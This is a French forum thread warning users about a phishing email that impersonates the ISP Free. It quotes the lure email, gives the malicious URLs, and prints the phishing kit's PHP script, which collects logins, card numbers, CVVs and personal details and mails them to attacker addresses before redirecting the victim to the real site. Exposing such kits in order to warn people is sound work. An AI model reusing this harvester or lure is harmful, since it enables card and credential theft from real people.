- Ce sujet est vide.
-
AuteurMessages
-
23 avril 2011 à 5 h 40 min #268
Bonjour
Excusez moi le terme, encore un petit con qui pense duper les internautes.
Faux mail envoyé sous pretexte par free avec des fautes :aie:
=>responsable financier”(l’adresse est fausse évidemment)
=>Objet: Free: Demande de confirmation des données financiereDepartement de l’examen des comptes de Free .
Dans le cadre de nos mesures de securite nous vous demandons des informations pour la raison suivante
Notre systeme a detecte des charges inhabituelles a une carte de credit liee a votre compte
connectez-vous et suivez les etapes pour activer votre compte.
Une fois que vous avez termine de prevoir des mesures pour retablir l’acces a votre compte. votre ligne sera automatiquement mis a jour .Merci de votre comprehension service a la clientele.
Comme on pourra le voir dans le mail, l’adresse sur laquelle on tombe est :
ht tp://77.9 2.89.97/~arinda/ free.fr/free/ >faux vraiment avoir perdu la tête pour faire apparaître l”user système au lieu de prendre un vrai faux domaine :aie:En plus de sa boulette ce petit con ne sait pas cacher ses fichiers php qu’il utilise pour piéger les gens
Voilà le code principal qui hack[PHP]
$ip = getenv(“REMOTE_ADDR”);
$message .= ”
Free.fr Full INFO Spam ReZulT
n”;
$message .= “Identifiant : “.$_POST.”n”;
$message .= “Mot de passe : “.$_POST.”n”;
$message .= ”
CC Infos—-n”;
$message .= “CardHolder Name : “.$_POST.”n”;
$message .= “Bank Name : “.$_POST.”n”;
$message .= “CreditCard Type : “.$_POST.”n”;
$message .= “CreditCard Number : “.$_POST.”n”;
$message .= “Expiry Date : “.$_POST.”/”.$_POST.”n”;
$message .= “CVV : “.$_POST.”n”;
$message .= “NCOM : “.$_POST.”n”;
$message .= “IDENTIFICATION : “.$_POST.”n”;
$message .= “PERSONELLE : “.$_POST.”n”;
$message .= ”
HolDer Infos—-n”;
$message .= “First Name : “.$_POST.”n”;
$message .= “Last Name : “.$_POST.”n”;
$message .= “Adresses : “.$_POST.”n”;
$message .= “city : “.$_POST.”n”;
$message .= “Code Zip : “.$_POST.”n”;
$message .= “Telephone : “.$_POST.”n”;
$message .= “DOB : “.$_POST.”/”.$_POST.”/”.$_POST.”n”;
$message .= ”
IP Infos—-n”;
$message .= “IP : $ipn”;
$message .= ”
= YoYo SPAM RESULT By Mr_ThE_kIlL =
n”;
$send = “said.aminevb@gmail.com,firdaous09@menara.ma”;
$subject = “Free.fr Full INFO Spam ReZulT”;
$headers = “From:“;
$headers .= $_POST.”n”;
$headers .= “MIME-Version: 1.0n”;{
mail($send,$subject,$message,$headers);
}
header(“Location: http://subscribe.free.fr/login/login.pl?login=”.$_POST.””);
?>[/PHP]Et donc il s’amusera à récupérer les données de vos cartes bancaires et a se les envoyer par mail, c’est un poil crédible parce que la page où se passe la choses est une copie misérable de le vraie page de free
on voit bien les adresses mails => said.aminevb@gmail.com,firdaous09@menara.ma. Ce petit semble être situé au maroc.Le conseil est toujours le même : ne pas cliquer sur n’importe quel lien et ne fournir de données bancaire sur n’importe quel site, surtout que là on n’est même pas en https
1 mai 2011 à 14 h 50 min #2565Toujours dans le même style un autre site malveillant pour récupérer vos informations personnelles => http:// 4bes trate.com/i /www.free.fr/adsl.html/
:cassetout::cassetout: -
AuteurMessages
- Vous devez être connecté pour répondre à ce sujet.
Commentaires récents